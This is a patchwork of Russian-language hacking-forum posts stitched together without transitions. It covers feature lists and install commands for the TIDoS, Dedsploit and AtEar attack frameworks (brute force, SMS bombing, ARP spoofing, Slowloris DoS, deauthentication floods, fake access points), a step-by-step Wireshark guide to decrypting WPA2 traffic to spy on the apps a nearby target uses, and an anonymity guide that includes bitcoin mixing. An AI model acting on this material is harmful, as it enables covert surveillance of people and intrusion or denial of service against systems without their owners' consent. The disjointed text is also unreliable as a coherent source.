Port Scanning Ingenious Modules

Simple Port Scanner via Socket Connections

TCP SYN Scan

TCP Connect Scan

XMAS Flag Scan

Fin Flag Scan

Service Detector

Crawlers

Depth 1

Depth 2 IMPROVED

Vulnerability Analysis

Web-Bugs & Server Misconfigurations

Insecure CORS iCORS

Same-Site Scripting

Zone Transfer DNS Server based

Clickjacking Framable Response

Security on Cookies HTTPOnly/Secure Flags

Cloudflare Misconfiguration Check + Getting Real IP

HTTP High Transport Security Usage

Spoofable Email (Missing SPF and DMARC Records)

Security Headers Analysis

Cross-Site Tracing (Port Based)

Network Security Misconfig. (Telnet Enabled)

Serious Web Vulnerabilities

File Intrusions

Local File Intrusion (LFI)

Remote File Inclusion (RFI)

OS Command Execution Linux & Windows (RCE)

Path Traversal (Sensitive Paths)

Cross-Site Request Forgery

SQL Injection

Cookie Value Based

Referer Value Based

User-Agent Value Based

Host Header Injection

Bash Command Injection Shellshock

Cross-Site Scripting beta

Cookie Value Based

Referer Value Based

User-Agent Value Based

CRLF Injection and HTTP Response Splitting

Auxillaries

Protocol Credential Bruteforce 3 more under dev.

FTP Bruteforce

SSH Bruteforce

POP 2/3 Bruteforce

SQL Bruteforce

String & Payload Encoder

URL Encode

Base64 Encode

HTML Encode

Plain ASCII Encode

Hex Encode

Octal Encode

Binary Encode

GZip Encode

Exploitation purely developmental

ShellShock

Как установить:

Код:

# git clone https://github.com/theinfecteddrake/TIDoS-Framework.git
# cd TIDoS-Framework
# chmod +x install
# pip install tld - на случай,если будет просить этот пакет
# ./install
# tidos - команда запуска

Информация предоставлена исключительно в рамках ознакомления и изучения проблем ИБ.

Запрещается использование инструмента в незаконных целях и без надлежащих обоюдосторонних договорённостей.

Но пришлось с ним повозиться,даже не помню какие пакеты он требовал.

Будьте готовы к тому,что запросто он не заведётся.

Работает он на ОС Debian,да и в установочном файле прописана команда установки через apt

И скачивание файлов с пакетами deb соответственно.

При установке нас встречает вот такое окно

Самое простое ,что характеризует TIDOS-это указание url цели.

Всё остальное сложно,хотя инструмент прекрасно работает.

Всегда переключает модули,предлагая различные тесты.

Остановить работу модуля можно с помощью клавиш Ctrl+C

При этом , работа продолжится с предоставлением очередного выбора опций.

Несколько часов могут пройти незаметно в компании с этим framework.

Есть возможность как ручного режима коррекции теста,так и автоматизированного.

Причём,такая опция присутствует на всех фазах проведения теста.

Надеюсь,что он понравится многим,а я на этом завершаю обзор.

Благодарю всех за внимание и до новых встреч.

Итак, вы хотите знать, чем занимается человек, который всегда разговаривает по телефону? Если вы находитесь в той же сети Wi-Fi, это так же просто, как открыть Wireshark и настроить несколько параметров. Мы будем использовать этот инструмент для расшифровки сетевого трафика WPA2, чтобы мы могли следить за тем, какие приложения работает в телефоне в режиме реального времени.

Хотя использование зашифрованной сети лучше, чем использование открытой, преимущество исчезает, если злоумышленник находится в той же сети. Если кто-то еще знает пароль к используемой вами сети Wi-Fi, с помощью Wireshark легко увидеть, что вы делаете в данный момент. Он может позволить злоумышленнику создать список всех приложений, запущенных на целевом устройстве, и сосредоточиться на приложениях, которые могут быть уязвимы.

Расшифровка зашифрованных пакетов

Когда вы используете сеть Wi-Fi, которая использует шифрование WPA2, безопасность вашего сеанса основывается на двух вещах. Первый - это пароль, который используется для генерации гораздо более длинного числа, PSK или предварительного общего ключа. Второе - это собственно рукопожатие, которое должно произойти, чтобы установить соединение. Если злоумышленник получает PSK для сети Wi-Fi и либо наблюдает, как вы подключаетесь к сети, либо пинает вас на мгновение, он может расшифровать ваш трафик Wi-Fi, чтобы увидеть, что вы делаете.

Контент веб-сайтов HTTPS не будет виден, но все обычные веб-сайты HTTP, которые вы посещаете, или любые небезопасные приложения HTTP-запросов на вашем телефоне, отображаются в открытом виде. Это может показаться не таким уж большим делом, но всего за 60 секунд легко узнать много нового о том, какое устройство мы отслеживаем, и что именно на нем работает. Кроме того, DNS-запросы для разрешения доменов, с которыми приложения должны общаться, чтобы работать, легко увидеть, определяя, какие приложения и службы активны.

Как это работает?

Чтобы осуществить эту атаку, необходимо выполнить несколько условий. Во-первых, нам нужен пароль, мы должны быть рядом с жертвой, чтобы мы могли записывать трафик, и мы должны иметь возможность отключить целевое устройство от сети или подождать, пока они снова подключатся. Мы откроем Wireshark и получим доступ к меню для дешифрования пакетов Wi-Fi, добавим PSK для включения дешифрования и будем ждать пакеты EAPOL от целевого устройства, подключающегося к сети.

Чтобы понять, к чему стремится целевое устройство, мы будем использовать фильтры захвата для выделения искомых пакетов DNS и HTTP. Чтобы увидеть полный список каждого домена, разрешенного устройством, мы также можем посмотреть сводку разрешенных доменов после завершения захвата. Мы можем использовать эту информацию, чтобы легко определить, какие службы запущены, даже если они работают только в фоновом режиме, и приложение не запускалось уже довольно давно.

Что вам понадобится

Для этого вам понадобится карта адаптера беспроводной сети, поддерживающая режим беспроводного монитора. Вы можете ознакомиться с нашими руководствами по выбору, который совместим с Kali и поддерживает режим монитора.

Затем вам понадобится смартфон на базе iOS или Android, подключенный к контролируемой сети Wi-Fi. Вы можете практиковать это в открытой сети Wi-Fi, чтобы увидеть то, что вы должны увидеть, так как иногда расшифровка может не сработать в первый раз. Вам также необходимо знать пароль и сетевое имя сети Wi-Fi, которую вы хотите отслеживать. Это позволит вам рассчитать предварительный общий ключ, что позволит нам расшифровать трафик в режиме реального времени.

1. Загрузите Wireshark и подключитесь к сети Wi-Fi

Загрузите и установите Wireshark, если он еще не установлен, и подключитесь к сети Wi-Fi, на которой находится ваша цель. Если вы планируете использовать PSK, а не сетевой ключ, вам следует рассчитать его с помощью инструмента Wireshark, так как вы можете не иметь доступа к интернету во время захвата, в зависимости от вашей карты.

Загрузив Wireshark, откройте его и посмотрите на сетевые интерфейсы. Прежде чем мы начнем захват, нам нужно настроить несколько параметров, чтобы убедиться, что карта записывается в правильном режиме.

2. Настройте Wireshark для захвата

Под опцией меню Wireshark выберите меню «Capture Options» в форме шестеренки.

Откроется окно «Capture interfaces», как показано ниже.

3. Начните захват сети и сканирование пакетов EAPOL

Если вы не подключены к сети, в которой находится ваша цель, вы не сможете видеть какие-либо пакеты, потому что вы можете быть на каком-то другом случайном канале. Wireshark не может фактически изменить канал, на котором включен адаптер беспроводной сети, поэтому, если вы ничего не получаете, это может быть причиной.

4. Расшифровывать трафик с помощью сетевого PSK

Теперь, когда у нас есть рукопожатия, мы можем расшифровать разговор с этого момента. Для этого нам нужно добавить сетевой пароль или PSK. Перейдите в раскрывающееся меню «Wireshark» и выберите «Preference». После выбора нажмите «Protocols».

В разделе «Protocols» выберите «IEEE 802.11» и нажмите «Enable decryption». Чтобы добавить сетевой ключ, нажмите «Edit» рядом с «Decryption keys», чтобы открыть окно для добавления паролей и PSK.

Выберите в меню «wpa-psk», а затем вставьте ключ. Нажмите Tab, затем сохраните, нажав «ОК».

После этого нажмите «ОК» в меню «Preferences, и Wireshark должен повторно отсканировать все захваченные пакеты и попытаться расшифровать их. Это может не сработать по разным причинам. Я смог заставить его работать большую часть времени, обеспечив хорошее рукопожатие (EAPOL) и переключаясь между сетевым паролем и PSK. Если это работает, мы можем перейти к этапу анализа трафика, чтобы выбрать используемые приложения.

5. Сканирование на наличие пакетов DNS и HTTP.

Теперь, когда мы сняли защиту от трафика, Wireshark может расшифровать их и сообщить нам, что устройства в этой сети Wi-Fi, для которых у нас есть рукопожатия, делают в режиме реального времени.

1. DNS-запросы

Чтобы увидеть интересные пакеты, мы начнем с DNS-запросов. DNS-запросы - это то, как приложения проверяют, не изменились ли IP-адреса, к которым они должны подключаться. Они будут направлены на доменные имена, в которых обычно содержится название приложения, что упрощает просмотр приложения на телефоне iPhone или Android и выполнение запросов.

Чтобы увидеть эти запросы, мы будем использовать два фильтра захвата, dns и http, которые покажут нам наиболее очевидные отпечатки пальцев, которые приложение оставляет через Wi-Fi. Сначала введите dns в строку фильтра захвата и нажмите Enter. Если это не работает, попробуйте переключиться между PSK и паролем несколько раз. Это отстой, но иногда это начнет работать.

Если ваша цель чувствует себя одиноко, вы можете увидеть ответ ниже. Tinder вызывает домен Tindersparks.com, а также множество других сервисов. Этот запрос является одним из самых очевидных.

Хотя использование Signal - хорошая идея, лучше использовать его с VPN. Причина? Даже открытие Signal создает обмен ниже, четко идентифицируя, что пользователь общается с зашифрованным мессенджером.

Попытка найти ту песню, которая играет с Shazam, оставляет следующий отпечаток.

Открытие приложения для вызова Uber создает запросы, которые вы видите ниже.

Ниже мы видим эффект открытия Venmo и приложения для перевода денег. Кажется, пришло время перенаправить этот запрос в другое место.

2. Пакеты HTTP

Далее мы можем увидеть несколько небезопасных веб-запросов, используя фильтр захвата http. Эти фильтры захвата содержат такую информацию, как useragent, который сообщает нам тип устройства, которое подключается. Мы можем проверить это, нажав на пакеты и развернув вкладку «Hypertext Transfer Protocol».

В этом примере мы видим небезопасные HTTP-запросы к серверу чата. Что, черт возьми это? Простое изучение пакета и разрешение домена сразу же дает нам ответ. Это WeChat! В этом телефоне установлен WeChat, и, кроме того, сообщения, которые из него поступают, не полностью зашифрованы.

Если мы хотим увидеть все, что было решено, мы можем нажать на вкладку меню «Statistics» и выбрать «Resolved Addresses», чтобы увидеть все домены, которые были разрешены в течение захвата. Это должен быть список услуг, к которым устройство подключается через приложения, запущенные на нем.

Эта разбивка делает еще проще увидеть, что цель была до этого.

Wireshark для Wi-Fi рискованная штука

Этот вид мониторинга может показаться инвазивным, но вы должны помнить, что ваш интернет-провайдер также ведет журнал этой информации и имеет право продавать эту информацию. Если вы хотите предотвратить такого рода отслеживание, вам нужен VPN, такой как Mullvad или PIA, который позволяет скрывать даже локальный трафик за надежным шифрованием. В местах, где вы, возможно, делаете что-то деликатное при подключении к данным, вам также следует по возможности использовать сотовые данные для предотвращения такого рода атак.

Сохранение анонимности в глобальной сети является непростой задачей. Сегодняшний интернет основан на рекламе и системах наблюдения, которые хотят, чтобы вы постоянно были на виду. Будь то национальная безопасность или желание продать вам смартфон, правительства и компании хотят знать о вас всё что можно. Непросто сбить их со следа.

Сохранить анонимность в сети можно, но со временем это всё труднее. Никакие меры нельзя назвать идеальными. И всё же, можно затруднить слежку за вами.

Анонимность имеет свои преимущества. Невозможность узнать вас и отследить ваши следы даёт определённую свободу. Правда, ради этой свободы придётся кое-чем пожертвовать. Многие удобства современного интернета основаны на составлении профилей пользователей, отслеживании и анализе поведения.

С учётом этого мы опишем шаги, которые можно предпринять, и инструменты для обеспечения анонимности в интернете.

Tor

Список инструментов для обеспечения анонимности не будет полным без сети Tor. Эта сеть состоит из узлов добровольцев по всему миру и является синонимом анонимности. Слово Tor является сокращением от The Onion Router. Сеть позволяет зашифровать ваш трафик и каждый раз при подключении к веб-серверу направлять этот трафик через случайным образом выбранные узлы, прежде чем он достигнет точки назначения.

Существуют десятки способов использовать Tor на разных устройствах. Самым популярным является Tor Browser. Нужно установить основанное на Firefox приложение на компьютер на Windows или Mac, чтобы выходить в сеть анонимно. На Android попробуйте Orbot. На платформе iOS официальная поддержка Tor отсутствует, но браузер Onion Browser кажется приличным вариантом.

У Tor есть несколько недостатков, в первую очередь низкая скорость доступа. Этот вариант не годится для просмотра видео или скачивания торрентов. Можно бродить по сайтам в интернете, на этом возможности Tor кончаются. Ресурсов добровольцев не хватает для более быстрого доступа.

Во-вторых, хотя ваш интернет-трафик будет зашифрован и отследить его нельзя, провайдер сможет понять, что вы используете Tor. Это может вызвать его подозрения, поскольку Tor часто используется для преступной деятельности. Провайдер может сократить вашу скорость доступа в интернет, послать предупреждение, сообщить о вас властям, даже если вы не делали ничего плохого.

По этой причине вместе с Tor используйте инструменты обфускации вроде Obfsproxy, включайте VPN при работе с Tor или делайте то и другое одновременно. Obfsproxy представляет собой проект Tor, который заставляет зашифрованный трафик выглядеть как незашифрованный, чтобы не привлекать лишнего внимания. О VPN будет сказано ниже.

Наконец, есть слухи, что правительство США умеет анализировать трафик Tor, в результате чего произошло несколько арестов. Одним из арестованных был Dread Pirate Roberts с Silk Road. Слухи утверждают, что правительство отслеживает активность на нескольких узлах Tor. Конкретных доказательств нет.

Live OS

Браузер подходит для того, чтобы вас не отследили рекламодатели и для периодических визитов в DarkNet. Однако, если вам нужна полная анонимность, требуется ядерный вариант. Хотя никто не может отследить вашу активность в Tor Browser, наверняка у вас множество приложений работают в фоновом режиме. Это программы для работы с текстом, видеоплееры, различные менеджеры, которые отправляют данные в интернет. Предполагается, что власти используют незашифрованные отчёты об ошибках системы Windows для поиска людей. Windows 10 содержит большой объём отслеживающего программного обеспечения, всё это по умолчанию включено.

Вы можете отключить все эти настройки и удалить все свои приложения, но это непрактичное решение. Вместо этого лучше использовать живую операционную систему. Она устанавливается с флешки или DVD. Изменив несколько настроек в BIOS компьютера, вы можете запустить полностью независимую операционную систему с носителя.

Официальной живой операционной системой проекта Tor является Tails. Весь интернет-трафик, не только в браузере, проходит через сеть Tor. Система не оставляет следов на вашем компьютере и все мгновенные сообщения, электронные письма и файлы зашифрованы. С ней легко работать и здесь есть защита от дурака.

Если Tails вам по каким-то причинам не подходит, другим вариантом является Whonix. Это независимая живая операционная система. Там применяется виртуальная машина в вашей реальной операционной системе. Здесь есть все преимущества Tails, тоже используется сеть Tor, при этом невозможны утечки IP-адреса. Вот только вам потребуется достаточно мощный компьютер для запуска виртуальной машины и процесс настройки довольно сложный.

Среди других вариантов можно назвать Kali, Qubes и ZeusGuard. Поищите информацию о них, чтобы узнать больше.

VPN без логов

Виртуальные частные сети зашифровывают весь трафик на устройстве и направляют через промежуточный сервер до нужной точки. Ваш реальный IP-адрес скрывается и сторонние наблюдатели, в том числе ваш провайдер, не могут вести мониторинг трафика.

Большинство провайдеров VPN используют на своих серверах общие IP-адреса. Десятки, сотни и даже тысячи людей получают одинаковый IP-адрес. В результате почти невозможно отследить активность конкретного человека среди такого большого количества людей.

VPN созданы для конфиденциальности, а не анонимности. Не стоит использовать исключительно VPN, если вы хотите по-настоящему спрятаться. Конфиденциальность и анонимность часто путают, но есть важное отличие. Анонимность означает, что никто не сможет идентифицировать вас. Конфиденциальность означает, что никто не может видеть, что вы делаете.

Использование VPN требует определённой степени доверия к провайдеру и его серверам. Мало какие провайдеры VPN обладают собственной инфраструктурой серверов. Ваш трафик зашифровывается на ваших жёстких дисках и остаётся зашифрованным до тех пор, пока не прибудет в место назначения. В течение короткого момента времени ваша активность видна провайдеру VPN.

По этой причине рекомендуется работать с провайдерами, которые не ведут логов. Это означает, что провайдер не сохраняет информацию о содержимом трафика пользователей. Если провайдер говорит правду насчёт отсутствия логов, это плюс.

В реальности не всё так просто. Некоторые провайдеры обещают отсутствие логов, но сохраняют кое-какие метаданные. В зависимости от того, насколько анонимным вы хотите быть, этот нюанс может быть важен. Метаданные не содержат информации о вашем трафике, но там могут быть сведения о том, когда вы пользовались VPN, как долго, сколько данных передали, даже ваш реальный IP-адрес. Всегда читайте политику конфиденциальности VPN-провайдера, чтобы получить информацию о таких деталях.

Даже немногочисленные VPN-провайдеры с реальным отсутствием логов требуют доверия со стороны клиентов. Мы никак не можем проверить, говорит провайдер правду или нет, и как он будет реагировать на запрос данных со стороны правительственных органов. Для обеспечения максимального уровня анонимности используйте VPN одновременно с Tor. Избегайте VPN на территории США и Европы, где законы о сохранении пользовательских данных и правительственные спецслужбы могут подвергнуть вашу анонимность риску.

Используйте Tor Browser вместе с VPN, что вдвое усложнит отслеживание. VPN можно настроить вручную в живых операционных системах вроде Tails.

DNS без логов

Когда вы вводите в адресную строку браузера URL, запрос отправляется на сервер DNS, чтобы найти IP-адрес, который соответствует указанному URL. Даже при использовании прокси вроде VPN эти запросы DNS могут отправляться за пределами зашифрованного туннеля на сервер по умолчанию. По умолчанию запросы DNS обычно идут и записываются на ближайший сервер вашего провайдера.

Если это случается во время работы с VPN, это называется утечка DNS. Многие провайдеры VPN предлагают защиту от утечек DNS, при которой весь интернет-трафик, включая запросы DNS, проходит через VPN. Эти провайдеры обычно работают с собственными серверами DNS, где не записывается, какие сайты вы посещаете, если обещается не вести логов.

Даже если VPN рекламирует защиту от утечек DNS, это утверждение может относиться только к утечкам IPv4. Запросы IPv6 DNS по-прежнему могут передаваться в сети по умолчанию и их видят веб-серверы и провайдеры. Было бы хорошо, если бы всё больше провайдеров VPN использовали серверы IPv6 DNS, но пока лучшим решением является отключение IPv6 в настройках интернета на вашем устройстве. Вот инструмент для проверки утечек IPv6 и IPv4 DNS.

Если у вашего VPN-провайдера нет защиты от утечек DNS или если вы вообще не пользуетесь DNS, попробуйте выбрать публичный сервис DNS без ведения логов. Можете поменять настройки DNS на устройстве, чтобы запросы не проходили через сервер вашего провайдера. Рекомендуются серверы DNS.WATCH или OpenNIC.

Временная электронная почта

Чтобы оставаться анонимным, нельзя входить в ваши существующие учётные записи. Между тем, многие веб-сайты и приложения требуют входа в аккаунт. В таком случае могут пригодиться временные адреса электронной почты.

Несколько сервисов предлагают бесплатные фальшивые и временные адреса электронной почты. Без регистрации и сообщений рекомендуется пользоваться Guerilla Mail. Здесь есть менеджер паролей, чтобы запоминать связанные с этими аккаунтами пароли.

Для более долгосрочных неотслеживаемых почтовых адресов лучшим вариантом может считаться ProtonMail. Это сервис со сквозным шифрованием с открытым исходным кодом, используются приложения для веба и мобильных устройств без раскрытия секретных данных. К сожалению, новые пользователи должны получить приглашение, поскольку возможности сервера ограничены. ProtonMail работает на основе пожертвований.

Если вы не хотите ждать приглашения, альтернативой является Zmail. Тут можно отправлять письма с фейковых адресов.

Никогда не используйте свой настоящий электронный адрес, когда пытаетесь сохранить анонимность. Даже не читайте электронные письма и не заходите в аккаунт. Если вы хотите отправить зашифрованное письмо с временного адреса, нужно настроить новые ключи PGP или S/MIME.

Криптовалюты

Если вы хотите сделать анонимную покупку или пожертвовать деньги, криптовалюты лучше, чем кредитные карты или платёжные системы вроде PayPal. Что не означает, что вы просто должны открыть биткоин-кошелек на крупных биржах вроде Coinbase, и начать тратить деньги.

Существует заблуждение о том, что биткоин всегда анонимный. На самом деле природа блокчейна такова, что каждая транзакция отслеживается и подтверждается. Эти публично доступные записи можно проанализировать, привязав ваши кошельки и транзакции к вашей личности.

Проанализировав активность, которая видна в публичном блокчейне любому желающему, обозреватель может связать вашу личность со всеми вашими кошельками и историей транзакций. В результате биткоин может быть даже менее конфиденциальным, чем банковский счёт.

Чтобы обойти это, используйте кошельки, которые меняют адрес после каждой транзакции. Отследить их будет труднее. Используйте также сервисы смешивания биткоина, где ваши деньги кладутся в общий пул с деньгами других людей и перемешиваются, прежде чем платёж отправится получателю.

Самое сложное заключается в анонимной покупки биткоинов, поскольку для этого нужны реальные деньги. Приватные сделки и биржи типа peer-to-peer вроде LocalBitcoins обеспечат максимальную анонимность при получении криптовалюты.

Помните, что биткоин является не единственной криптовалютой, хотя и самой популярной. Существует множество других криптовалют, вроде Litecoin, DarkCoin, Dogecoin.

Поисковые системы

Google отслеживает каждый ваш поисковый запрос. Если вы пользуетесь Tor, это неважно, но всё же желательно найти другой вариант для поиска.

Например, DuckDuckGo. Это один из самых популярных поисковых сервисов, который не наблюдает за профилями пользователей. Его можно установить в качестве поисковой системы по умолчанию в вашем браузере.

DuckDuckGo представляет собой полностью независимый браузер, поэтому результаты будут не такие полноценные, как в Google. К счастью, можно получить результаты из Google без самой Google.

StartPage убирает идентифицирующую вас информацию и выполняет каждый поисковый запрос в Google вместо вас. Записей о пользовательской активности не ведётся. Все поисковые результаты отображаются со ссылкой на прокси под ними, позволяя перейти на любой сайт через прокси и сохранить при этом конфиденциальность.

Передача файлов

Бывает, что нужно отправить кому-то анонимно файл, слишком крупный для вложения в электронное письмо. Например, вы хотите опубликовать какие-то документы, но чтобы никто не знал, что это сделали вы. В таком случае выложить файлы в Dropbox будет недостаточно.

FileDropper является простым и удобным решением, где можно загружать до 5 Гб данных без регистрации. WeTransfer является ещё одним вариантом, который позволяет выкладывать до 2 Гб данных без регистрации. В таких сервисах можно выложить файлы и отправить ссылки на них.

Не забывайте заходить на эти сайты при помощи Tor и делиться ссылками при помощи временной электронной почты или других методов анонимности. Сайт может собирать информацию о посетителях, пусть даже регистрация не нужна.

Тщательно выбирайте расширения для браузера

Tor Browser мало поддерживается в расширениях браузеров, на что есть причина. Рекламодатели отслеживают пользователей всё более изощрённо. Одним из самых продвинутых методов слежки является фингерпринтинг. Собирая сведения о вашем веб-браузере, какие расширения установлены, какое устройство у вас, на каком языке и т.д., компании создают ваш профиль.

Это даже лучше, чем IP-адрес. Вы можете перезагрузить маршрутизатор или задействовать VPN и ваш IP-адрес изменится. При этом у вас останется прежний компьютер или мобильное устройство, прежний процессор и объём памяти, браузер и прочие определяющие характеристики.

Многие расширения помогают поддерживать конфиденциальность. Среди них можно назвать ABP, Disconnect, Privacy Badger, HTTPS Everywhere. Однако, они же вносят вклад в формирование профилей фингерпринтинга. Это одна из причин того, почему трудно сохранить анонимность в популярных браузерах вроде Firefox или Chrome.

Если вы хотите протестировать, как хорошо браузер защищает вас от слежки, откройте веб-сайт Panopticlick. Этот инструмент от Electronic Frontier Foundation (EFF) подробно показывает, как рекламное агентство может определить ваш браузер при помощи уникального отпечатка.

Кроме фингерпринтинга, расширения браузеров могут общаться с серверами незаметно для вас. Потенциально они могут записывать мета-данные, которые могут определить вас и вашу сетевую активность.

Зашифрованное общение

Кроме электронной почты вы можете захотеть спрятать следы отправки сообщений и звонков. Шифрование больше предназначается для конфиденциальности, чем для анонимности. Даже если сообщение зашифровано, можно определить отправителя и получателя. Впрочем, для достижения анонимности можно кое-что сделать.

Signal является самым популярным приложением для зашифрованных голосовых звонков на смартфонах. Также здесь есть мгновенный обмен сообщениями. Пользователи могут подтверждать идентичность своих контактов при помощи сравнения ключевых отпечатков.

Для зашифрованных текстовых и мультимедийных сообщений существует множество бесплатных и приватных опций. TorChat использует зашифрованные сообщения peer-to-peer в сети Tor. Здесь не нужна установка и запускать приложения можно с флешки. Среди альтернатив можно назвать Pidgin и CryptoCat.

Зашифрованные резервные копии

Даже при сохранения анонимности нужно выполнять резервное копирование и хранить большие файлы. Иногда требуется давать к ним доступ другим людям. Держитесь подальше от Google Drive и Dropbox, поскольку здесь нет защиты конфиденциальности вроде шифрования и нет никакой анонимности.

Резервные копии лучше делать локально на зашифрованном внешнем жёстком диске. Crashplan предлагает бесплатную версию своей программы для этого.

Если вы хотите облачный сервис, нужен доверенный провайдер. Выбирайте сервис вида zero knowledge, который позволяет задавать собственные ключи шифрования. Это доступно в SpiderOak, iDrive, BackBlaze, Crashplan, что не позволит провайдеру расшифровать ваши файлы.

Если вы хотите работать с Google Drive, Dropbox или другими хранилищами без шифрования, можно сначала зашифровать файлы, прежде чем отправлять их в облако.

Безопасность веб-камеры

Известно, что веб-камеры можно активировать дистанционно и шпионить за пользователями. Марк Цукерберг и глава ФБР даже наклеивают на них изоленту.

Дистанционно активировать веб-камеры могут вредоносные приложения. Система защиты от вирусов в реальном времени и периодическое антивирусное сканирование помогут защититься от этого. Если у вашего ноутбука есть светодиодный индикатор, который загорается при активации камеры, убедитесь, что этот индикатор работает. Если вы не хотите заклеивать камеру изолентой, закрывайте ноутбук, когда не работаете с ним.

Обеспечение безопасности маршрутизатора Wi-Fi

Многие пользователи даже не думают о том, чтобы поменять настройки маршрутизатора после его покупки. Незащищённые маршрутизаторы могут стать целью злоумышленников. Можно перехватывать трафик, читать, вносить в него изменения. Если вы в чужой сети Wi-Fi, желательно использовать VPN.

Если вы хотите оставаться анонимным, важно изменить логин и пароль на вход в настройки маршрутизатора, обновлять прошивку, задать самый серьёзный уровень шифрования (обычно WPA2), ограничить входящий и исходящий трафик, отключить WPS, отключить неиспользуемые сервисы, проверить порт 32764, включить и читать логи, выходить из маршрутизатора после завершения работы.

iOS и Android не лучшим образом подходят для обеспечения анонимности

Если вы выбираете устройство на Android или iOS по критерию анонимности, используйте Android. Однако, даже здесь полная анонимность вам недоступна.

На смартфоне поддерживать анонимность намного тяжелее, чем на компьютере. Инструменты анонимности Tor не настолько развитые, чтобы хорошо работать на мобильных устройствах. Apple и Google тесно связаны с этими устройствами. Вы можете заходить на сайты onion при помощи приложения Orbot на Android, но этим ваши возможности и ограничены. Официальные браузеры Tor для iOS отсутствуют.

Отсутствуют живые операционные системы, с которыми могли бы работать смартфоны, как TAILS на компьютерах.

У смартфонов есть номера IMEI, MAC-адреса, уязвимости в операционной системе, которые невозможно закрыть и которые могут быть использованы для определения конкретного устройства при его выходе в интернет. Поскольку производители обычно вносят изменения в Android, сложно сказать, какие уязвимости есть в конкретных устройствах. Apple и Google могут отслеживать любое устройство на iOS и Android соответственно.

Приложения постоянно общаются с серверами в интернете, передавая данные туда-сюда. Эти данные позволяют отследить пользователей. Даже такая простая вещь, как программная клавиатура, может применяться для анализа активности. Камеры и микрофоны могут быть взломаны для шпионажа за пользователями. Когда устройство получает сигнал от сотовой вышки, определяется его местоположение. В общем, на Android и iOS происходит много такого, чего пользователи не могут контролировать.

Хотя попытка сделать смартфоны полностью анонимными кажется бессмысленной, можно сделать их значительно более конфиденциальными. На Android можно зашифровать устройство, iPhone зашифрованы по умолчанию. Использование VPN шифрует трафик, можно также задать последовательность самоуничтожения, если несколько раз неправильно ввести пароль или пин-код.

Наконец, компании вроде Silent Circle выпускают Android-смартфоны с прицелом на безопасность. Например, Blackphone полностью зашифрован и работает с несколькими виртуальными телефонами для разделения данных по категориям. Silent Circle предлагает сервис с подпиской для обеспечения конфиденциальности iPhone. Как уже говорилось выше, здесь обеспечивается конфиденциальность, а не анонимность. Содержимое смартфона будет защищено, но можно будет узнать, чей это смартфон.

Опасайтесь интернета вещей

Интернет вещей открывает новые возможности для хакеров и шпионажа. Многие производители устройств интернета вещей о безопасности думают в последнюю очередь. Простая запись о том, в какое время дня включается умный кондиционер, может дать подсказку о привычках его владельца. Критики предупреждали об опасности работы с устройствами вроде Amazon Echo, которые всегда слушают голосовые команды, даже когда выключены.

В зависимости от вашей сетевой активности это может быть угрозой для анонимности пользователя. Используйте устройства интернета вещей с осторожностью.

Создайте список необходимых мер

Ни один инструмент анонимности не является идеальным, даже Tor. Это не означает, что они неэффективные. Хотя богатые корпорации или правительственные организации могут потратить много времени и денег на анализ трафика в сети Tor и в конечном счете найдут человека, которого ищут, скорее пользователь сам совершит ошибку и выдаст себя.

Как избежать таких ошибок? Можно составить список. Каждый раз, когда вы хотите сохранить анонимность в сети, сверяйтесь со списком. Запишите его на листке бумаги, но не записывайте здесь никаких логинов и паролей и другой идентифицирующей информации. Вот как может выглядеть этот список:

• Подключайтесь к сервису VPN без логов
• Выходите в интернет через Tor Browser/Tails
• Используйте сервер DNS без логов
• Выходите из всех сетевых аккаунтов после завершения работы
• Закрывайте все приложения и фоновые сервисы с подключением к интернету
• Отключайте и блокируйте всю слежку в браузере и операционной системе
• Отправляйте письма через временную электронную почту
• Регистрируйте новые аккаунты и входите в них через временную электронную почту
• Ищите информацию при помощи DuckDuckGo и StartPage
• Смешивайте биткоины и используйте сторонние кошельки

При использовании такого списка вы сократите вероятность совершения ошибки. Не будьте самоуверенны. Можно 100 раз делать всё правильно, а потом ошибиться и всё пойдет прахом.

Приветствую всех. В этой статье речь пойдет о фреймворке для тестирования на проникновение под названием Dedsploit

Dedsploit– предназначается для атак по SSH, SMTP и HTTP. Авторы говорят, что данный фреймворк поможет осуществлять такие атаки очень просто и не прибегая к сложностям.

Зависимости:

· Nmap

· Python 2.7.x

Основные особенности:

· SSH; брутфорс уязвимого сервера SSH.

· SMTP; брутфорс SMTP-адреса.

· SMSBomb - использует SMTP, электронную почту как шлюз спам SMS-сообщений.

· HTTP; Arpspoof - MITM, где пользователь фальсифицирует сообщения ARP по локальной сети, перехватывает пакеты от хоста

· Slowloris - Layer-7 DoS атака с использованием медленных заголовков и неправильно сформированных запросов GET на уязвимый веб-сервер.

· pscan - сканирование портов с Nmap

· hosts - поиск активных хостов

Установка и использование:

Выполняем в терминале следующие команды:

>git clone https://github.com/ex0dus-0x/dedsploit

>chmod a+x installer.py

>chmod a+x dedsploit.py

Дальнейшие действия необходимо производить от обычного пользователя, который входит в группу sudo.

> sudo python installer.py

Выбираем свою операционную систему и дожидаемся окончания установки:

Так же от имени пользователя запускаем фреймворк:

>sudo python dedsploit.py

> help (посмотреть список доступных модулей)

Страница проекта на Github - https://github.com/ex0dus-0x/dedsploit

Всем привет. Представляю вашему вниманию эффективную систему для оценки уязвимостей беспроводных сетей.

Разработчик -===NORMA-Inc/AtEar

Имеется веб-интерфейс.

Введение.

AtEar - система с веб-интерфейсом, предназначенная для оценки уязвимостей беспроводных сетей.

Функционал

1. Сканирование беспроводных сетей. (Банальная основа.)
2. Графики с данными о беспроводных сетях (Канал, Шифрование, Тип).
3. Беспроводной пентестинг (WEP, WPA1, WPA2).
4. Получение сетевой информации (IP, Информация о подключённых хостах).
5. Fake AP (фальшивая точка доступа).

WIDS (Wireless intrusion detection system — Система обнаружения беспроводных вторжений)

1. Флуд для рассоединения.
2. Флуд для деаутентификации.
3. Атака WESSID-NG.
4. Атака Koreck Chopchop.
5. Атака Fragmentation PGRA.
6. Атака MDK MICHEAL SHUTDOWN Exploitation TKIP.
7. Атака TKIPUN-NG.
8. DOS Атака.
9. Флуд.
10. Большое количество отправляемых сообщений.
11. (Rogue AP).
12. (Beacon Flood).

Брутфорс службы

1. Брут-форс FTP.
2. Брут-форс SSH.
3. Брут-форс Telnet.
4. Брут-форс SMTP.
5. Брут-форс POP.
6. Брут-форс IMAP.
7. Брут-форс LDAP.
8. Брут-форс SMB.
9. Брут-форс rlogin.
10. Брут-форс MSSQL.
11. Брут-форс MYSQL.
12. Брут-форс PGSQL.
13. Брут-форс VNC.
14. Брут-форс SNMP.

Зависимости:

1. aircrack-ng.
2. tshark.
3. hostapd.
4. python-dev.
5. python-flask.
6. python-paramiko.
7. python-psycopg2.
8. python-pyodbc.
